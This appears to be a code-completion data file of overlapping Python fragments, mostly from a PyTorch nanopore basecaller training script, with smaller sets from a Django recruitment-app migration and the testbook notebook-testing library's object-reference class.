"np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc),",
"self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std =",
"optimizer.step() if (val_ds != None) and (updates % make_validation == 0): # or",
"= 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" *",
"{0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) *",
"start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell",
"self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll =",
"self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input',",
"self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional",
"from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))),",
"label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\")",
"3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates':",
"output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\")",
"= args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch =",
"clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None:",
"#Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if",
"----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size =",
"epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss",
"validation loss to check if it has decresed, # and if it has,",
"index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path",
"plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf,",
"running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b",
"sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0,",
"= val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y =",
"early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv,",
"else: teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc =",
"nargs='?', const=True, default=False) return parser # Network # ----------- # * CNN-Encoder #",
"import random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from",
"== max_in_batch: break # when seq length (i) >= true seq length if",
"iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing",
"= dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch,",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.",
"# if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio *",
"5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes =",
"token] for i in max_for: # Stop looping if we got to the",
"n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0],",
"that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted",
"train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(),",
"\", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(),",
"\"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3]))",
"bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias",
"\"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases",
"\"linear\" not in p: n = matrix_param[p].shape[0] # input gate start, end =",
"only batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c =",
"fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"needs the validation loss to check if it has decresed, # and if",
"input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers,",
"seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] #",
"# create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size,",
"{} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {}",
"== 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m =",
"seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of",
"if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\" not",
"0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn",
"pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1,",
"torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname),",
"val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the",
"= divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint =",
"\"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\")",
"epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd",
"const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?',",
"LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx =",
"1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes",
"editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED)",
"= max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances",
"+= acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val +=",
"updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] =",
"dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to",
"input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\"",
"np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b =",
"= input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k])",
"or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and",
"AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\")",
"=====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\",",
"label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle)",
"convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val",
"= args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher =",
"'--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v',",
"p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{}",
"cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5,",
"#!/usr/bin/env python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved.",
"val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0]",
"= 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" *",
"parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len =",
"print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \"",
"shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size,",
"validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number',",
"label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] =",
"output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output",
"earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value =",
"= x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) #",
"print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds",
"forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2)",
"const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay',",
"target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3:",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def",
"########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden =",
"get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping",
"the following conditions are met: 1. Redistributions of source code must retain the",
"= fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch ==",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1,"
] |
[
"export candidate list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name': '应聘者', 'verbose_name_plural': '应聘者'},",
"by Django 3.1 on 2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration): dependencies",
"02:18 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ]",
"migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify interviewer for candidate",
"dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export',",
"candidate list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name': '应聘者', 'verbose_name_plural': '应聘者'}, ),",
"class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate',",
"[ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export",
"options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name':",
"on 2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('interview',",
"Generated by Django 3.1 on 2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration):",
"# Generated by Django 3.1 on 2020-08-29 02:18 from django.db import migrations class",
"3.1 on 2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration): dependencies = [",
"] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify',",
"name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify interviewer for candidate review')],",
"= [ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can",
"django.db import migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations =",
"'0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'),",
"2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'),",
"import migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations = [",
"'Can export candidate list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name': '应聘者', 'verbose_name_plural':",
"[ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify interviewer for",
"Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions':",
"operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify",
"migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions(",
"[('export', 'Can export candidate list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name': '应聘者',",
"('interview', '0003_auto_20200828_2215'), ] operations = [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate",
"Django 3.1 on 2020-08-29 02:18 from django.db import migrations class Migration(migrations.Migration): dependencies =",
"list'), ('notify', 'notify interviewer for candidate review')], 'verbose_name': '应聘者', 'verbose_name_plural': '应聘者'}, ), ]",
"from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('interview', '0003_auto_20200828_2215'), ] operations",
"= [ migrations.AlterModelOptions( name='candidate', options={'permissions': [('export', 'Can export candidate list'), ('notify', 'notify interviewer"
] |
[
"e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue)",
"has no attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs))",
"self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code)",
"PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb self.name: str =",
"rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname}",
"raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format(",
"IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name,",
"TestbookRuntimeError ) from .utils import random_varname from .translators import PythonTranslator class TestbookObjectReference: def",
"self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname",
"no attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) )",
"raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value)",
"IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code",
"TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value):",
"def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname)",
"except TestbookExecuteResultNotFoundError: # No return value from function call pass except TestbookSerializeError as",
"args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function",
"is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}]",
".exceptions import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from",
"TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self,",
"TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} ==",
"TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self,",
"raise IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs):",
"object has no attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name,",
"__iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def",
"def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration:",
"e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\")",
"self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if",
"def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is",
"__call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError:",
"tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return",
"No return value from function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb,",
"StopIteration: raise StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError",
"as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise",
"'{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self,",
"name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name):",
"IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args,",
"_type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"):",
"def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name},",
"from .utils import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb,",
"else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key),",
"is StopIteration: raise StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except",
"TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators import PythonTranslator class",
"def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except",
"raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item):",
"== {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\"",
"StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e:",
"class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb self.name: str = name",
") def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} =",
"return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call pass except",
"function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname) def resolve(self): return",
"e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise",
"__getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError:",
"if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\")",
"= self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value",
"if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key): try: return",
"*args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: #",
"value from function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname) def",
"call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname) def resolve(self): return self.tb.value(self.name)",
"# No return value from function call pass except TestbookSerializeError as e: return",
"repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object",
"pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass",
"__eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\")",
"), pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif",
"def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ),",
"__len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\")",
"except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is",
"( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators import",
"TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators import PythonTranslator class TestbookObjectReference:",
"return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration else:",
"def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args,",
"__contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs)",
"elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\")",
"return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif",
".utils import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name):",
"= {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass",
"return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return",
"__repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise",
"{rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\"",
"attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def",
"iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as",
"else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code =",
"def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name})",
"self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from",
"e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def",
"raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs}",
"import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators",
